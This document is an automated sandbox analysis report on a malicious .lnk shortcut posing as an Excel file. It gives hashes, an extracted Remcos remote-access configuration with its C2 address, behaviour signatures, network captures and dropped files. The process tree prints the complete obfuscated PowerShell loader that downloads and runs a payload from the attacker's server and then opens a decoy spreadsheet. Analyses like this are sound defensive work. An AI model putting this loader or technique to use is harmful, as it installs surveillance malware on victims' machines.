Analysis

  • max time kernel
    148s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-09-2024 01:16

General

  • Target

    rv_luti_2024_roku.xlsx.lnk

  • Size

    32KB

  • MD5

    bbcc000caf3fff5b3025da99cff2aa45

  • SHA1

    89a89db57a5b286b16d8d0a82903a4f256584bb5

  • SHA256

    3e5adec34d0e3567b3eed2c917eaac783ff3eb19c2a1154339ebd1b2497f1e24

  • SHA512

    1eecf2183c2909e642904dc023256b8f1437a25d59c541afa53b6eff4c9f727ef1fcdc3a7507f94e5d75ba490263c5a0fa2be95a1cfc4734a07a874d4bba56e1

  • SSDEEP

    48:88muavUQSSE1I3fxvUZ7sEmOxCCevUZ731EdCZFXuGdZTa7x:88y8EE1YfxHERxCVybuKQ

Malware Config

Extracted

Family

remcos

Botnet

stalagg

C2

5.181.156.117:8576

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-5TL39W

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo mDDkSKPeKSnmyhDKrRrfgmsmeF; echo anUGxZjKUCNgLKMBbyEjctOscTtBFAQROSENvflIdGfTRJUxVqfCL; echo ykxRyjMJeSrZAgkrYWGta; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EMNQacYrNXHyebrpmkIKUbKIwHYVxkqDyqbnvplWDcpbb; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo XbwVjPDNPkbnuGZQfsRvcJknOPJXCFbqSFCKR; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo zqCIRBDMssIzkDEUagHLMaYQOxVloBQv; s''t''a''rt rv_luti_2024_roku.xlsx
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4936
      • C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe
        "C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe
          C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1320
      • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3272
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          4⤵
            PID:4044
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:3008

      Network

      • flag-md
        GET
        http://5.181.156.117/glorytoukraine.zip
        powershell.exe
        Remote address:
        5.181.156.117:80
        Request
        GET /glorytoukraine.zip HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
        Host: 5.181.156.117
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Sat, 07 Sep 2024 01:16:42 GMT
        Server: Apache/2.4.52 (Ubuntu)
        Last-Modified: Wed, 28 Aug 2024 15:21:08 GMT
        ETag: "2e931b-620bfe845e100"
        Accept-Ranges: bytes
        Content-Length: 3052315
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/zip
      • flag-md
        GET
        http://5.181.156.117/racs/rv_luti_2024_roku.xlsx
        powershell.exe
        Remote address:
        5.181.156.117:80
        Request
        GET /racs/rv_luti_2024_roku.xlsx HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
        Host: 5.181.156.117
        Response
        HTTP/1.1 200 OK
        Date: Sat, 07 Sep 2024 01:18:09 GMT
        Server: Apache/2.4.52 (Ubuntu)
        Last-Modified: Wed, 24 Jul 2024 21:02:48 GMT
        ETag: "8201-61e0499b8ee00"
        Accept-Ranges: bytes
        Content-Length: 33281
        Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
      • flag-us
        DNS
        117.156.181.5.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        117.156.181.5.in-addr.arpa
        IN PTR
        Response
        117.156.181.5.in-addr.arpa
        IN PTR
        no-rdns mivocloudcom
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.214.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.214.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        23.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        23.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        28.118.140.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        28.118.140.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        183.59.114.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.59.114.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        228.249.119.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        228.249.119.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        56.126.166.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        56.126.166.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        13.86.106.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.86.106.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        43.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        43.229.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        roaming.officeapps.live.com
        EXCEL.EXE
        Remote address:
        8.8.8.8:53
        Request
        roaming.officeapps.live.com
        IN A
        Response
        roaming.officeapps.live.com
        IN CNAME
        prod.roaming1.live.com.akadns.net
        prod.roaming1.live.com.akadns.net
        IN CNAME
        eur.roaming1.live.com.akadns.net
        eur.roaming1.live.com.akadns.net
        IN CNAME
        weu-azsc-000.roaming.officeapps.live.com
        weu-azsc-000.roaming.officeapps.live.com
        IN CNAME
        osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
        osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
        IN A
        52.109.89.19
      • flag-nl
        POST
        https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
        EXCEL.EXE
        Remote address:
        52.109.89.19:443
        Request
        POST /rs/RoamingSoapService.svc HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: text/xml; charset=utf-8
        User-Agent: MS-WebServices/1.0
        SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
        Content-Length: 511
        Host: roaming.officeapps.live.com
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Type: text/xml; charset=utf-8
        Server: Microsoft-IIS/10.0
        X-OfficeFE: RoamingFE_IN_81
        X-OfficeVersion: 16.0.18025.30575
        X-OfficeCluster: weu-000.roaming.officeapps.live.com
        X-CorrelationId: 10c3167c-5fa8-43a2-b5c3-bd87dc577041
        X-Powered-By: ASP.NET
        Date: Sat, 07 Sep 2024 01:18:11 GMT
        Content-Length: 654
      • flag-us
        DNS
        97.32.109.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        97.32.109.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        19.89.109.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        19.89.109.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        240.143.123.92.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.143.123.92.in-addr.arpa
        IN PTR
        Response
        240.143.123.92.in-addr.arpa
        IN PTR
        a92-123-143-240deploystaticakamaitechnologiescom
      • flag-us
        DNS
        22.160.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        22.160.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        130.109.69.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        130.109.69.13.in-addr.arpa
        IN PTR
        Response
      • 5.181.156.117:80
        http://5.181.156.117/racs/rv_luti_2024_roku.xlsx
        http
        powershell.exe
        67.4kB
        3.2MB
        1406
        2278

        HTTP Request

        GET http://5.181.156.117/glorytoukraine.zip

        HTTP Response

        200

        HTTP Request

        GET http://5.181.156.117/racs/rv_luti_2024_roku.xlsx

        HTTP Response

        200
      • 52.109.89.19:443
        https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
        tls, http
        EXCEL.EXE
        1.7kB
        7.7kB
        11
        10

        HTTP Request

        POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

        HTTP Response

        200
      • 5.181.156.117:8576
        tls
        explorer.exe
        1.9kB
        1.2kB
        10
        10
      • 8.8.8.8:53
        117.156.181.5.in-addr.arpa
        dns
        72 B
        107 B
        1
        1

        DNS Request

        117.156.181.5.in-addr.arpa

      • 8.8.8.8:53
        217.106.137.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        217.106.137.52.in-addr.arpa

      • 8.8.8.8:53
        172.214.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.214.232.199.in-addr.arpa

      • 8.8.8.8:53
        23.159.190.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        23.159.190.20.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        28.118.140.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        28.118.140.52.in-addr.arpa

      • 8.8.8.8:53
        183.59.114.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        183.59.114.20.in-addr.arpa

      • 8.8.8.8:53
        228.249.119.40.in-addr.arpa
        dns
        73 B
        159 B
        1
        1

        DNS Request

        228.249.119.40.in-addr.arpa

      • 8.8.8.8:53
        56.126.166.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        56.126.166.20.in-addr.arpa

      • 8.8.8.8:53
        13.86.106.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        13.86.106.20.in-addr.arpa

      • 8.8.8.8:53
        43.229.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        43.229.111.52.in-addr.arpa

      • 8.8.8.8:53
        roaming.officeapps.live.com
        dns
        EXCEL.EXE
        73 B
        247 B
        1
        1

        DNS Request

        roaming.officeapps.live.com

        DNS Response

        52.109.89.19

      • 8.8.8.8:53
        97.32.109.52.in-addr.arpa
        dns
        71 B
        145 B
        1
        1

        DNS Request

        97.32.109.52.in-addr.arpa

      • 8.8.8.8:53
        19.89.109.52.in-addr.arpa
        dns
        71 B
        145 B
        1
        1

        DNS Request

        19.89.109.52.in-addr.arpa

      • 8.8.8.8:53
        240.143.123.92.in-addr.arpa
        dns
        73 B
        139 B
        1
        1

        DNS Request

        240.143.123.92.in-addr.arpa

      • 8.8.8.8:53
        22.160.190.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        22.160.190.20.in-addr.arpa

      • 8.8.8.8:53
        130.109.69.13.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        130.109.69.13.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\79fefd29

        Filesize

        1.2MB

        MD5

        914f7b7fca3ff7756b87850df76f06fc

        SHA1

        4a15cd5440581655fb64f4ae79510e1dcdf8caa9

        SHA256

        d61a27f86dfc47b06ad3887d976fe90e5b1f9b438fa25701a4a2e5021b0aba97

        SHA512

        7a7817f7bb3f0445bd9350ad0a6d44db7910a8e0640a1dacf95162d511097cf573ff076a0d118bcdd5b4400a90ac922933ccb7c5baa48efe38a74d1aa2b93d81

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nhyug3sx.0nb.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

        Filesize

        354B

        MD5

        6e2e415b1ffecd0ea0742a4e135d03ab

        SHA1

        571da1a3d40675a314b1373eadbdcc439fb99e99

        SHA256

        44d80996b6ba4f95430af2569b2c1763e18044d8d2fddbbcd0b7dcad611be647

        SHA512

        c2508a721fb8d4b096326639da50834d093cd18254f1f13f0163846efc23c458fde3740c45c19ecd5a35b2d823f62077c11a878efc0148543c52f4f549c02a18

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

        Filesize

        2KB

        MD5

        eebb581ed27d3d4dc8163f6bd366b30b

        SHA1

        d9f18637615c371b54f25ec7f2ebc9d3c3d2fa6e

        SHA256

        d5b04157079d7aac198e8ed4e6ae37e689fcc58129fb4349897390271464d4b6

        SHA512

        2ac6ce164d79e53395a1404326edbd4019b0f6448e555782ffeff398a842c5e5eb7f7fc6848398f7cfa3bc3ce5b07ddda670a46cbbe0c75d46eed874b5af98f7

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

        Filesize

        1KB

        MD5

        e623ae6fa6306ad3a1de71f7f0b73ea3

        SHA1

        193077f845a08d18510509b690acd20054af810f

        SHA256

        73410e4f554da3a0e83ab357bd336295f61f807be282ffb5d137250aa31309be

        SHA512

        32db7b4ddaf644f87ee9a5fda322fea8d7a3ccb1fa02627d53d71dd9fad6efa5ebfa8a22b830a1f0712d7df059939f7edea1fe791214f06466be907b39e81a7e

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\d3dx9_43.dll

        Filesize

        1.9MB

        MD5

        46e435aecb557fcb16ae2ea3b22ab7fd

        SHA1

        5290156599fd9575c4401c80949ad5672fe64da5

        SHA256

        70e0b720bb461503acbd947a8355fb629d703b8d7f99ddfbb09a0c71886861da

        SHA512

        621010aa44868062361c6dbb670f8664c370ddcb0afbb5835765470522c03bb5ac779e86236cfffdcf343cbc582f81beacd2a7108d78c90d4dfc4c38e7d23bb3

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\rnyt

        Filesize

        1.0MB

        MD5

        289d2d639e058b63ebe16bd8d543115d

        SHA1

        969736e5f6a2c416f556e2f73358020573486afc

        SHA256

        f21bf56c8d15824dc1cf4108725f73154b88a89ab23f00a7f8dbb2d2de8e2568

        SHA512

        7adf83c9795d9705c4c1345422d17ad26b6d4f27a8242674f44b2d2a05080e532d9a64c43803164bf25c4e9eb5cac7a0d3789d71e9f34b46b5b9c6203fad65aa

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe

        Filesize

        2.2MB

        MD5

        d9530ecee42acccfd3871672a511bc9e

        SHA1

        89b4d2406f1294bd699ef231a4def5f495f12778

        SHA256

        81e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280

        SHA512

        d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\tkjm

        Filesize

        80KB

        MD5

        cae9827c507632c4a1980479c21a42a2

        SHA1

        d9a1c5900a93066645bf8fb7c79dacf56f3eaa3e

        SHA256

        efeec4c2f612130ec81f3796bba26471e14dcf97b0e22247b7c7f40ad2eba0cf

        SHA512

        441fb631ed26bfe5b84c4fd267a43fbacc64e0adae0e90d0d8e11a248fa2ab47d43a54f1cc3903532943d158d87a2e236976830834545b0d13471731b6f61768

      • C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx

        Filesize

        32KB

        MD5

        21046015d5d9ef5e536ac7643b1ab365

        SHA1

        f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05

        SHA256

        7a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd

        SHA512

        d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e

      • memory/1320-112-0x00007FFF68DF0000-0x00007FFF68FE5000-memory.dmp

        Filesize

        2.0MB

      • memory/1320-113-0x0000000000550000-0x00000000005D4000-memory.dmp

        Filesize

        528KB

      • memory/1320-116-0x0000000000550000-0x00000000005D4000-memory.dmp

        Filesize

        528KB

      • memory/1320-117-0x0000000000550000-0x00000000005D4000-memory.dmp

        Filesize

        528KB

      • memory/1824-67-0x00007FFF68DF0000-0x00007FFF68FE5000-memory.dmp

        Filesize

        2.0MB

      • memory/1824-90-0x0000000074BB0000-0x0000000074D2B000-memory.dmp

        Filesize

        1.5MB

      • memory/1824-65-0x0000000074BB0000-0x0000000074D2B000-memory.dmp

        Filesize

        1.5MB

      • memory/2848-110-0x0000000074BB0000-0x0000000074D2B000-memory.dmp

        Filesize

        1.5MB

      • memory/2848-93-0x00007FFF68DF0000-0x00007FFF68FE5000-memory.dmp

        Filesize

        2.0MB

      • memory/3272-61-0x00007FFF28E70000-0x00007FFF28E80000-memory.dmp

        Filesize

        64KB

      • memory/3272-68-0x00007FFF269D0000-0x00007FFF269E0000-memory.dmp

        Filesize

        64KB

      • memory/3272-66-0x00007FFF28E70000-0x00007FFF28E80000-memory.dmp

        Filesize

        64KB

      • memory/3272-62-0x00007FFF28E70000-0x00007FFF28E80000-memory.dmp

        Filesize

        64KB

      • memory/3272-69-0x00007FFF269D0000-0x00007FFF269E0000-memory.dmp

        Filesize

        64KB

      • memory/3272-63-0x00007FFF28E70000-0x00007FFF28E80000-memory.dmp

        Filesize

        64KB

      • memory/3272-53-0x00007FFF28E70000-0x00007FFF28E80000-memory.dmp

        Filesize

        64KB

      • memory/3776-42-0x0000000074140000-0x00000000742BB000-memory.dmp

        Filesize

        1.5MB

      • memory/3776-46-0x00007FFF68DF0000-0x00007FFF68FE5000-memory.dmp

        Filesize

        2.0MB

      • memory/4936-21-0x000001C0AE860000-0x000001C0AE86A000-memory.dmp

        Filesize

        40KB

      • memory/4936-64-0x00007FFF4A700000-0x00007FFF4B1C1000-memory.dmp

        Filesize

        10.8MB

      • memory/4936-2-0x00007FFF4A703000-0x00007FFF4A705000-memory.dmp

        Filesize

        8KB

      • memory/4936-20-0x000001C0AE8C0000-0x000001C0AE8D2000-memory.dmp

        Filesize

        72KB

      • memory/4936-19-0x00007FFF4A700000-0x00007FFF4B1C1000-memory.dmp

        Filesize

        10.8MB

      • memory/4936-16-0x00007FFF4A700000-0x00007FFF4B1C1000-memory.dmp

        Filesize

        10.8MB

      • memory/4936-15-0x00007FFF4A703000-0x00007FFF4A705000-memory.dmp

        Filesize

        8KB

      • memory/4936-14-0x00007FFF4A700000-0x00007FFF4B1C1000-memory.dmp

        Filesize

        10.8MB

      • memory/4936-13-0x00007FFF4A700000-0x00007FFF4B1C1000-memory.dmp

        Filesize

        10.8MB

      • memory/4936-12-0x000001C0AE890000-0x000001C0AE8B2000-memory.dmp

        Filesize

        136KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.